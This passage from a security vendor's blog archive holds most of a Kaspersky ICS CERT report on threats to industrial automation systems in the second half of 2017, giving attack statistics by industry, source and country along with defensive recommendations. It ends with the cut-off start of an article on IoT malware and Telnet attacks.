Trisis.\n\nThe malware is a modular framework that can automatically find Triconex Safety Controllers on the enterprise network, get information on their operating modes and plant malicious code on these devices. Trisis/Triton embeds a backdoor in the device's firmware, enabling the attackers to remotely read and modify not only the code of the legitimate control program, but also the code of the compromised Triconex device's firmware. With such capabilities, attackers can do serious damage to the enterprise's industrial process. The least harmful of possible negative consequences is the system's emergency shutdown and interruption of the industrial process. It was this type of event that caused a victim organization to launch an investigation, which resulted in the attack being detected.\n\nIt remains unknown how the attackers penetrated the enterprise's infrastructure. What is known is that they must have been inside the compromised organization's network for a sufficiently long time (several months) and used legitimate software and 'dual-use' utilities for lateral movement and privilege escalation.\n\nAlthough the attack was designed to modify code on Triconex devices, the code that the attackers were apparently trying to inject in the last stage of the attack has never been found, so it is currently impossible to determine the final objective of the attack.\n\n#### Spear phishing \u2014 Formbook spyware\n\nSpear phishing attacks on industrial organizations continued in the second half of 2017. We have already [written](<https://ics-cert.kaspersky.com/reports/2017/06/15/nigerian-phishing-industrial-companies-under-attack/>) about spear phishing used by threat actors in Business Email Compromise (BEC) attacks. Compared to attacks described earlier, the attackers' tactics have not changed significantly. However, in addition to known Trojan-Spy malware sent in phishing emails to global industrial and energy companies (FareIT, HawkEye, ISRStealer, etc.), a new representative of this malware class \u2013 Formbook \u2013 gained popularity in the second half of 2017.\n\nFormbook attacks involve sending phishing emails with malicious Microsoft Office documents attached. To download and install malware on target systems, these documents exploit the CVE-2017-8759 vulnerability or use macros. Some phishing emails include attached archives of different formats containing the malicious program's executable file. Examples of attached file names:\n\n * RFQ for Material Equipment for Aweer Power Station H Phase IV.exe\n * Scanned DOCUMENTS & Bank Details For Confirmation.jpeg (Pages 1- 4) -16012018. jpeg.ace\n * PO & PI Scan.png.gz\n * zip\n * QUOTATION LISTS.CAB\n * shipping receipts.ace\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130531/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130531/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-12.png>)\n\n_Sample phishing email used to distribute Formbook_\n\nIn terms of implementation and the techniques used to obfuscate the code and encrypt the payload, Formbook differs from its 'peers' in that its functionality is more extensive. In addition to standard spyware features, such as making screenshots, capturing keypresses and stealing passwords stored in browsers, Formbook can steal sensitive data from HTTP/HTTPS/SPDY/HTTP2 traffic and web forms. Additionally, the malware implements remote system control functionality and uses an unusual technique to resist the analysis of network traffic. The Trojan generates a set of URLs to which it is going to connect, using a list of legitimate domains stored in its body. It then adds one URL for its command-and-control server. In this way, the malware attempts to mask its connections to the malicious domain by sending numerous requests to legitimate resources, making its detection and analysis more difficult.\n\n## Threat statistics\n\n_All statistical data used in this report was collected using the _[_Kaspersky Security Network_](<https://kas.pr/Gzu1>)_ (KSN), a distributed antivirus network. The data was received from those KSN users who gave their consent to have data anonymously transferred from their computers. We do not identify the specific companies/organizations sending statistics to KSN, due to the product limitations and regulatory restrictions._\n\n### Methodology\n\nThe data was received from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. This group includes Windows computers that perform one or several of the following functions:\n\n * supervisory control and data acquisition (SCADA) servers,\n * data storage servers (Historian),\n * data gateways (OPC),\n * stationary workstations of engineers and operators,\n * mobile workstations of engineers and operators,\n * Human Machine Interface (HMI).\n\nThe statistics analyzed also include data received from computers of industrial control network administrators and software developers who develop software for industrial automation systems.\n\nFor the purposes of this report, attacked computers are those on which our security solutions have been triggered at least once during the reporting period. When determining percentages of machines attacked, we use the ratio of _unique_ computers attacked to all computers in our sample from which we received anonymized information during the reporting period.\n\nICS servers and stationary workstations of engineers and operators often do not have full-time direct internet access due to restrictions specific to industrial networks. Internet access may be provided to such computers, for example, during maintenance periods.\n\nWorkstations of system/network administrators, engineers, developers and integrators of industrial automation systems may have frequent or even full-time internet connections.\n\nAs a result, in our sample of computers categorized by Kaspersky Lab ICS CERT as part of the industrial infrastructure of organizations, about 40% of all machines have regular or full-time internet connections. The remaining machines connect to the Internet no more than once a month, many less frequently than that.\n\n### Percentage of computers attacked\n\nIn the second half of 2017, Kaspersky Lab products blocked attempted infections on **37.8%** of ICS computers protected by them, which is 0.2 percentage points more than in the first half of 2017 and 1.4 percentage points less than in the second half of 2016.\n\nJune \u2013 August 2017 saw a decline in the number of attacked computers. However, in September there was a notable increase in cybercriminal activity, with the proportion of attacked machines rising to 20% and not falling below that level again for the rest of the year.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130539/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-13.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130539/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-13.png>)\n\n__Percentage of ICS computers attacked globally by month, 2017__\n\nWhen comparing these values with the same period in 2016, we see that the July numbers are practically identical. However, for all other months the percentage of attacked machines in 2016 was higher than in 2017.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130545/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-14.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130545/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-14.png>)\n\n_Percentage of ICS computers attacked globally by month, H2 2017 vs H2 2016_\n\nA certain decrease in the percentage of computers attacked can be attributed to several factors. It is likely that one has to do with industrial enterprises paying more attention to the security of industrial segments on their networks. According to our experts' assessments, changes for the better may be largely due to simple measures: enterprises have begun to conduct audits of the industrial segments of their networks, train employees in the principles of cyber-hygiene, more properly differentiate access rights between the corporate and the industrial segments of their network, etc.\n\n### Percentage of ICS computers attacked in different industries\n\nAccording to our assessment, medium-size and large companies with mature IT security processes tend to use Kaspersky Lab corporate solutions (mainly Kaspersky Industrial CyberSecurity and Kaspersky Endpoint Security) to safeguard their ICS infrastructure. Many smaller organizations and individual engineers, along with companies whose IT and OT cybersecurity still leaves much to be desired, may rely on Kaspersky Lab consumer solutions to protect their ICS computers. The percentage of such computers attacked by malware during the reporting period is significantly higher compared to the corresponding figures for computers protected by corporate products.\n\nWe intentionally excluded statistics coming from our consumer solutions when analyzing attacks on industrial facilities in different industries, using only telemetry data coming from Kaspersky Lab products for corporate users. This resulted in lower average attacked computers percentage values than for the rest of the analysis results presented in this report, where both Kaspersky Lab corporate and consumer product statistics were used.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130552/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-15.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130552/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-15.png>)\n\n_Percentage of ICS computers attacked in different industries*, H2 2017 vs H1 2017_\n\n*In this report, unlike our previous reports, we calculated the percentage of attacked ICS computers for each industry (the percentage of ICS computers attacked in an industry to all ICS computers in that industry).\n\nIn previous reports, we included the distribution of attacked ICS computers by industry (the percentage of computers attacked in a given industry to all attacked computers in our sample).\n\nAccording to statistics on attacks against facilities in different industries, nearly all industries demonstrate similar percentages of attacked ICS computers, which are in the range from 26 to 30 percent. We believe this may be due to the similarity of ICS architectures used to automate industrial processes at enterprises in various industries and, possibly, similarities in the processes used by enterprises to exchange information with external entities and inside the enterprises themselves.\n\nTwo industries were attacked more than others during the reporting period: the figures for Energy (38.7%) and Engineering & ICS Integrators (35.3%) are above 35%.\n\nWe believe that the high percentage of attacked ICS systems in the energy sector may be explained, on the one hand, by the greater network connectivity of electric power sector facilities (compared to facilities in other industries) and, on the other hand, perhaps by the fact that, on average, more people have access to the industrial control systems of energy sector facilities than to those at enterprises in other industries.\n\nThe supply chain attack vector has infamously been used in some devastating attacks in recent years, which is why the high percentage of attacked ICS computers in Engineering and ICS Integration businesses is a problem that is serious enough to be noticed.\n\nThe only industry whose figures showed a significant growth in the six months (+ 5.2 p.p.) is Construction (31.1%). The reason for the high percentage of ICS computers attacked in construction organizations could be that, for enterprises in the industry, industrial control systems often perform auxiliary functions, were introduced a relatively short time ago and are consequently at the periphery of company owners' and managers' attention. The upshot of this may be that objectives associated with protecting these systems from cyberthreats are regarded as having a relatively low priority. Whatever the reason for the high percentage of attacks reaching industrial control systems in construction and engineering, the fact seems sufficiently alarming. Construction is known to be a highly competitive business and cyberattacks on industrial organizations in this industry can be used as a means of unfair competition. So far, cyberattacks have been used in the construction industry mainly for purposes associated with the theft of commercial secrets. Infecting industrial control systems may provide threat actors with a new weapon in their fight against competitors.\n\nThe three least attacked industries are Mining (23.5%), Logistic & Transportation (19.8%) and ICS Software Development (14.7%).\n\nICS vendor infections might be very dangerous, because the consequences of an attack, spread over the infected vendor's partner ecosystem and customer base, could be dramatic, as we saw in the recent wide-scale incidents, such as the exPetr malware epidemic.\n\nThis report includes information on ICS computers at educational facilities. These figures include not only ICS systems used in demonstration stands and labs performing instructional and research functions, but also in industrial automation systems of various facilities that are part of the infrastructure of educational establishments, such as power supply systems (including power generation and distribution), utilities, etc., as well as ICS used in pilot production facilities.\n\nThe figure for educational establishments can be regarded as representing the \"background level\" of accidental threats affecting ICS systems, considering systems at educational establishments to be as insecure as such systems can get. This is because ICS systems at educational establishments are usually connected to the respective organizations' general-purpose networks and are less isolated from the outside world than the systems of industrial facilities.\n\nAt the same time, we believe that attacks on ICS systems at educational establishments can also pose a significant threat to enterprises in different real-sector industries \u2013 primarily because universities/colleges maintain working contacts and engage in collaboration with industrial enterprises. This includes joint research labs, engineering and development centers, personnel training and career development centers, etc.\n\nIn addition, such ICS systems can be used by attackers to test and debug malicious code and refine attacks against real-sector enterprises.\n\nEducation demonstrates the greatest difference between the H1 and H2 percentages of ICS systems attacked. The high figure for H1 was due to the large number of internet-borne attacks, as well as attacks by malware belonging to the [Trojan.Multi.Powercod](<https://securelist.com/fileless-attacks-against-enterprise-networks/77403/>) family. That malware uses techniques that are similar to those described by our colleagues [here](<https://securelist.com/fileless-attacks-against-enterprise-networks/77403/>). In H1 2017, 9.8% of ICS computers in educational establishments from our sample were attacked by Powercod Trojans. In H2, the corresponding figure was 0.7%.\n\n### Sources of industrial automation system infection\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130558/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-16.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130558/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-16.png>)\n\n_Main sources of threats blocked on ICS computers, \npercentage of ICS computers attacked, H2 2017 vs H1 2017_\n\nIn the second half of 2017, most of the numbers for the main infection sources remained at H1 2017 levels.\n\nFor computers that are part of the industrial infrastructure, the internet remains the main source of infection. Contributing factors include interfaces between corporate and industrial networks, availability of limited internet access from industrial networks, and connection of computers on industrial networks to the internet via mobile phone operator networks (using mobile phones, USB modems and/or Wi-Fi routers with 3G/LTE support). Contractors, developers, integrators and system/network administrators that connect to the control network externally (directly or remotely) often have unrestricted internet access. Their computers are in the highest-risk group and can be used by malware as a channel for penetrating the industrial networks of the enterprises they serve. As we mentioned above, about 40% of computers in our sample connect to the internet on a regular basis. It should be noted that, in addition to malicious and infected websites, the \"Internet\" category includes phishing emails and malicious attachments opened in web-based email services (in browsers).\n\nExperts from Kaspersky Lab ICS-CERT note that malicious programs and scripts built into email message bodies are often used in targeted attacks on industrial enterprises. In most cases, the attackers distribute emails with malicious attachments in office document formats, such as Microsoft Office and PDF, as well as archives containing malicious executable files.\n\nThere has also been a 1.7 p.p. decrease in the proportion of threats detected while scanning removable media. This is an important indicator, because such devices are often used to transfer information in industrial networks.\n\nThe other figures did not change appreciably.\n\n### Classes of malware\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130605/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-17.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130605/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-17.png>)\n\n_Malware classes, percentage of ICS computers attacked, H2 2017_\n\nTrojan malware, which is designed to penetrate the systems being attacked, deliver and launch other malware modules, remains relevant to ICS computers. The malicious code of these programs was most commonly written in scripting languages (Javascript, Visual Basic Script, Powershell, AutoIt in the AutoCAD format) or took the form of Windows shortcuts (.lnk) that pointed to the next malicious modules.\n\nThese Trojans most often tried to download and execute the following malware as main modules:\n\n * spyware Trojans (Trojan-Spy and Trojan-PSW)\n * ransomware (Trojan-Ransom)\n * backdoors (Backdoor)\n * remote administration tools installed without authorization (RAT)\n * Wiper type programs (KillDisk) designed to delete (wipe) data on the hard drive and render the computer unusable\n\nMalware infections of computers on an industrial network can result in the loss of control or the disruption of industrial processes.\n\n### Platforms used by malware\n\nIn the second half of 2017, we saw a significant increase in the percentage of ICS computers affected by malware written for the JavaScript platform.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130613/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-18.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130613/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-18.png>)\n\n_Platforms used by malware, percentage of ICS computers attacked, H2 2017 vs H1 2017_\n\nThe main reason for growing figures for the JavaScript platform is the increase in the number of phishing emails that include a loader for Trojan-Ransom.Win32.Locky.\n\nIn the latest versions of such emails, the attackers used a fax-received notification template.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130621/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-19.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130621/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-19.png>)\n\nThe phishing emails include an attachment \u2013 an obfuscated loader written in JavaScript and designed to download and execute the main malicious module from servers controlled by the attackers.\n\nIt is important to note that threat actors often attack legitimate websites in order to host malware components on these sites. Threat actors do this to hide malicious traffic behind legitimate domains to mask the traces of an attack.\n\nCryptocurrency miners also made a small contribution to the increase in the share of the JavaScript platform \u2013 both the versions for browsers and the script-based loaders of miners for the Windows platform.\n\n### Geographical distribution of attacks on industrial automation systems\n\nThe map below shows the percentages of industrial automation systems attacked to the total number of such systems in each country.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130629/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-20.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130629/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-20.png>)\n\n_Geographical distribution of attacks on industrial automation systems, H2 2017 \nPercentage of attacked ICS computers in each country_\n\nTOP 15 countries by percentage of ICS computers attacked:\n\n| **Country*** | **% of systems attacked** \n---|---|--- \n1 | Vietnam | 69.6 \n2 | Algeria | 66.2 \n3 | Morocco | 60.4 \n4 | Indonesia | 60.1 \n5 | China | 59.5 \n6 | Egypt | 57.6 \n7 | Peru | 55.2 \n8 | Iran | 53.0 \n9 | India | 52.4 \n10 | Kazakhstan | 50.1 \n11 | Saudi Arabia | 48.4 \n12 | Mexico | 47.5 \n13 | Russia | 46.8 \n14 | Malaysia | 46.7 \n15 | Turkey | 44.1 \n \n*_Countries in which the number of ICS computers monitored by Kaspersky Lab ICS CERT was insufficient to obtain representative data sets were excluded from the ranking._\n\nThe Top 5 has remained unchanged since H1 2017.\n\nThe least affected countries in this ranking are Israel (8.6%), Denmark (13.6%), the UK (14.5%), the Netherlands (14.5%), Sweden (14.8%) and Kuwait (15.3%).\n\nEgypt has moved from ninth place to sixth \u2013 the percentage of attacked ICS machines in that country grew by 6.1 p.p. This is the most significant growth among all countries of the world. Internet threats accounted for most of the growth in the percentage of attacked ICS computers in Egypt. Among the internet threats detected, the most common were sites infected with script-based cryptocurrency miners and attempts to download malware by following URL links.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130636/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-21.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130636/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-21.png>)\n\n_Main sources of threats blocked on ICS computers in Egypt \npercentage of ICS computers attacked, H2 2017 vs H1 2017_\n\nMalware distributed via removable media is also a real problem for many ICS in Egypt. Malware loaders distributed on removable media are disguised as existing user files on the removable drive, increasing the chances of a successful attack.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130643/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-22.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130643/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-22.png>)\n\n_Examples of names used for loaders of malware distributed via removable media that were blocked on ICS computers in Egypt in H2 2017_\n\nIn most cases, the loaders that we detected were designed to launch the malware module responsible for infecting the system, including downloading the main module, infecting removable media and network shares and propagating via email/instant messengers to an existing list of contacts.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130652/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-23.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130652/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-23.png>)\n\n_Malicious code for the AutoIt platform, launched by a malicious .lnk loader \nblocked on an ICS computer in Egypt in H2 2017_\n\nIn Russia during H2 2017, 46.8% of ICS computers were attacked at least once \u2013 a 3.8 p.p. rise on H1 2017. This saw Russia move up from 21st to 13th.\n\nThe proportions of attacked ICS machines vary greatly between different regions of the world.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130701/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-24.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130701/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-24.png>)\n\n_Percentage of ICS systems attacked in regions of the world, H2 2017 vs H1 2017_\n\nAll regions can be assigned to one of three groups according to the percentage of attacked ICS machines:\n\n 1. Proportion of attacked ICS systems below 30%. This group includes North America and Europe, where the situation looks the most peaceful. Kaspersky Lab ICS CERT specialists say this does not necessarily mean that industrial enterprises in these regions are less frequently attacked by cybercriminals; rather, it could be that more attention is paid to ensuring information security at industrial enterprises in these regions, which results in fewer attacks reaching ICS.\n 2. Proportion of attacked ICS systems between 30% and 50%. This group includes Latin America, Russia and the Middle East.\n 3. Proportion of attacked ICS systems above 50%. The situation is most acute in Africa and the Asia-Pacific region.\n\nIt should be noted that values may differ significantly between countries within the same region. This may be due to different practices and approaches to ICS information security in those countries.\n\nIn particular, the Asia-Pacific region includes Vietnam with the highest global proportion of attacked ICS systems (69.6%) alongside countries such as Japan (25%), Australia (24.1%) and Singapore (23.2%), where figures did not exceed 25%.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130707/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-25.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130707/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-25.png>)\n\n_Percentage of attacked ICS computers in Asia-Pacific countries, H2 2017 vs H1 2017_\n\nIn Europe, Denmark's score (13.6%) was not only the lowest in the region but also one of the lowest globally, while the proportions of attacked ICS systems in Belarus (41%), Portugal (42.5%) and Ukraine (41.4%) were all above 40%.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130713/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-26.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130713/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-26.png>)\n\n_Percentage of attacked ICS computers in Europe, H2 2017 vs H1 2017_\n\nLet's now look at the sources of attacks that affected ICS systems in different regions.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130719/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-27.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130719/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-27.png>)\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130725/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-28.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130725/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-28.png>)\n\n_Main sources of threats blocked on ICS computers in different regions, H2 2017_\n\nIn all regions of the world, the internet remains the main source of attacks. However, in Europe and North America, the percentage of blocked web-borne attacks is substantially lower than elsewhere. This may be because most enterprises operating in those regions adhere to information security standards. In particular, internet access is restricted on systems that are part of industrial networks. The situation is similar for infected removable devices: the highest numbers are seen in Africa and the Asia-Pacific region, while the lowest are in Europe and North America. These figures also reflect the level of compliance with information security standards and, in particular, whether restrictions are in place to prevent the connection of unauthorized removable media to industrial infrastructure systems.\n\nCuriously, in spite of the sufficiently high overall percentage of attacks that reached ICS systems, the percentages of ICS computers attacked via removable media and email clients in Russia were relatively small \u2013 4.4% and 1.4% respectively. One possible explanation is that risks associated with these attack vectors are largely mitigated through organizational measures, as well as removable media and email handling practices established at industrial enterprises. This interpretation is reassuring, since removable media and email are often used as penetration vectors in sophisticated targeted and APT attacks.\n\nFor countries of the Middle East, email was a significant (5%) source of infection, with the region leading the ranking based on this parameter.\n\n## Our recommendations\n\nTo prevent accidental infections in industrial networks, we recommend taking a set of measures designed to secure the internal and external perimeters of these networks.\n\nThis includes, first and foremost, measures required to provide secure remote access to automation systems and secure transfer of data between the industrial network and other networks that have different trust levels:\n\n * Systems that have full-time or regular connections to external networks (mobile devices, VPN concentrators, terminal servers, etc.) should be isolated into a separate segment of the industrial network \u2013 the demilitarized zone (DMZ);\n * Systems in the demilitarized zone should be divided into subnets or virtual subnets (VLAN), with restricted access between subnets (only the communications that are required should be allowed);\n * All the necessary communication between the industrial network and the outside world (including the enterprise's office network) should be performed via the DMZ;\n * If necessary, terminal servers that support reverse connection methods (from the industrial network to the DMZ) can be deployed in the DMZ;\n * Thin clients should be used whenever possible to access the industrial network from the outside (using reverse connection methods);\n * Access from the demilitarized zone to the industrial network should be blocked;\n * If the enterprise's business processes are compatible with one-way communication, we recommend that you consider using data diodes.\n\nThe threat landscape for industrial automation systems is continually changing, with new vulnerabilities regularly found both in application software and in industrial software. Based on the threat evolution trends identified in H2 2017, we recommend placing special emphasis on the following security measures:\n\n * Regularly updating the operating systems, application software and security solutions on systems that are part of the enterprise's industrial network;\n * Installing firmware updates on control devices used in industrial automation systems in a timely manner;\n * Restricting network traffic on ports and protocols used on the edge routers between the organization's network and those of other companies (if information is transferred from one company's industrial network to another company);\n * An emphasis on account control and password policies is recommended. Users should have only those privileges that are required for them to perform their responsibilities. The number of user accounts with administrative privileges should be as limited as possible. Strong passwords (at least 9 characters, both upper and lower case, combined with digits and special characters) should be used, with regular password changing enforced by the domain policy, for example, every 90 days.\n\nTo provide protection from accidental infections with new, previously unknown malware and targeted attacks, we recommend doing the following on a regular basis:\n\n 1. Taking an inventory of running network services on all hosts of the industrial network; where possible, stopping vulnerable network services (unless this will jeopardize the continuity of industrial processes) and other services that are not directly required for the operation of the automation system; special emphasis should be made on services that provide remote access to file system objects, such as SMB/CIFS and/or NFS (which is relevant in the case of attacks on systems running Linux).\n 2. Auditing ICS component access control; trying to achieve maximum access granularity.\n 3. Auditing the network activity in the enterprise's industrial network and at its boundaries. Eliminate any network connections with external and other adjacent information networks that are not required by industrial processes.\n 4. Verifying the security of remote access to the industrial network; placing a special emphasis on whether demilitarized zones are set up in compliance with IT security requirements. To the fullest extent possible, minimizing or completely eliminating the use of remote administration tools (such as RDP or TeamViewer). More details on this are provided above.\n 5. Ensuring that signature databases, heuristics and decision algorithms of endpoint security solutions are up-to-date. Checking that all the main protection components are enabled and running and that ICS software folders, OS system folders or user profiles are not excluded from the scope of protection. Application startup control technologies configured in whitelisting mode and application behavior analysis technologies are particularly effective for industrial enterprises. Application startup control will prevent cryptomalware from running even if it finds its way on to the computer, while application behavior analysis technologies are helpful for detecting and blocking attempts to exploit vulnerabilities (including unknown) in legitimate software.\n 6. Auditing policies and practices related to using removable media and portable devices. Blocking devices that provide illegitimate access to external networks and the Internet from being connected to industrial network hosts. Wherever possible, disabling the relevant ports or controlling access to these ports using properly configured dedicated tools.\n\nIn addition, to provide protection from targeted attacks directed at the enterprise's industrial network and its main industrial assets, we recommend deploying tools that provide network traffic monitoring and detection of cyberattacks on industrial networks. In most cases, such measures do not require any changes to ICS components or their configuration and can be carried out without suspending their operation.\n\nOf course, completely isolating the industrial network from adjacent networks is virtually impossible, since transferring data between networks is required to perform a variety of important functions \u2013 controlling and maintaining remote facilities, coordinating sophisticated industrial processes, parts of which are distributed between numerous workshops, lines, plants and support systems. We hope, however, that our recommendations will help you provide maximum protection for your industrial networks and automation systems against existing and future threats.\n\n_**Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT)** is a global project of Kaspersky Lab aimed at coordinating the work of industrial automation system vendors, owners and operators of industrial facilities and IT security researchers in addressing issues associated with protecting industrial enterprises and critical infrastructure facilities._\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2012/08/08092111/pdf_small5.gif) **Read the full \"Threat Landscape for Industrial Automation Systems in H2 2017\" report (English, PDF)**](<https://ics-cert.kaspersky.com/media/KL_ICS_REPORT_H2-2017_FINAL_EN_22032018.pdf>)", "cvss3": {}, "published": "2018-03-26T10:00:27", "type": "securelist", "title": "Threat Landscape for Industrial Automation Systems in H2 2017", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-8759"], "modified": "2018-03-26T10:00:27", "id": "SECURELIST:D257E8B7FC070ED8409973F0F9A689E6", "href": "https://securelist.com/threat-landscape-for-industrial-automation-systems-in-h2-2017/85053/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-28T10:13:53", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/18085355/abstract-iot-990x400.jpg)\n\nCybercriminals' interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn't bode well for the years ahead.\n\nWe decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.\n\n_Number of malware samples for IoT devices in Kaspersky Lab's collection, 2016-2018._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/17153718/en-iot-malware-collection.png>)\n\nOne of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/>) than all other types combined.\n\n**service** | **% of attacks** \n---|--- \n**Telnet** | 75.40% \n**SSH** | 11.59% \n**other** | 13.01% \n \nWhen it came to downloading malware onto IoT devices, cybercriminals' preferred option was one of the [Mirai](<https://securelist.com/is-mirai-really-as-black-as-its-being-painted/76954/>) family (20.9%).\n\n**#** | **downloaded malware** | **% of attacks** \n---|---|--- \n**1** | Backdoor.Linux.Mirai.c | 15.97% \n**2** | Trojan-Downloader.Linux.Hajime.a | 5.89% \n**3** | Trojan-Downloader.Linux.NyaDrop.b | 3.34% \n**4** | Backdoor.Linux.Mirai.b | 2.72% \n**5** | Backdoor.Linux.Mirai.ba | 1.94% \n**6** | Trojan-Downloader.Shell.Agent.p | 0.38% \n**7** | Trojan-Downloader.Shell.Agent.as | 0.27% \n**8** | Backdoor.Linux.Mirai.n | 0.27% \n**9** | Backdoor.Linux.Gafgyt.ba | 0.24% \n**10** | Backdoor.Linux.Gafgyt.af | 0.20% \n \n_Top 10 malware downloaded onto infected IoT device following a successful Telnet password crack_\n\nAnd here are the Top 10 countries from which our traps were hit by Telnet password attacks:\n\n_Geographical distribution of the number of infected devices, Q2 2018._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/17153651/en-map-infected-devices-q2-2018.png>)\n\nAs we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%). Overall for the period January 1 \u2013 July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.\n\nSince some smart device owners change the default Telnet password to one that is more complex, and many gadgets don't support this protocol at all, cybercriminals are constantly on the lookout for new ways of infection. This is stimulated by the high competition between virus writers, which has led to password bruteforce attacks becoming less effective: in the event of a successful crack, the device password is changed and access to Telnet is blocked.\n\nAn example of the use of \"alternative technology\" is the Reaper botnet, whose assets at end-2017 numbered about 2 million IoT devices. Instead of bruteforcing Telnet passwords, this botnet exploited known software vulnerabilities:\n\n * [Vulnerabilities in D-Link 850L router firmware](<https://blogs.securiteam.com/index.php/archives/3364>)\n * [Vulnerabilities in GoAhead IP cameras](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html>)\n * [Vulnerabilities in MVPower CCTV cameras](<https://www.pentestpartners.com/security-blog/pwning-cctv-cameras/>)\n * [Vulnerability in Netgear ReadyNAS Surveillance](<https://blogs.securiteam.com/index.php/archives/3409>)\n * [Vulnerability in Vacron NVR](<https://blogs.securiteam.com/index.php/archives/3445>)\n * [Vulnerability in Netgear DGN devices](<http://seclists.org/bugtraq/2013/Jun/8>)\n * [Vulnerabilities in Linksys E1500/E2500 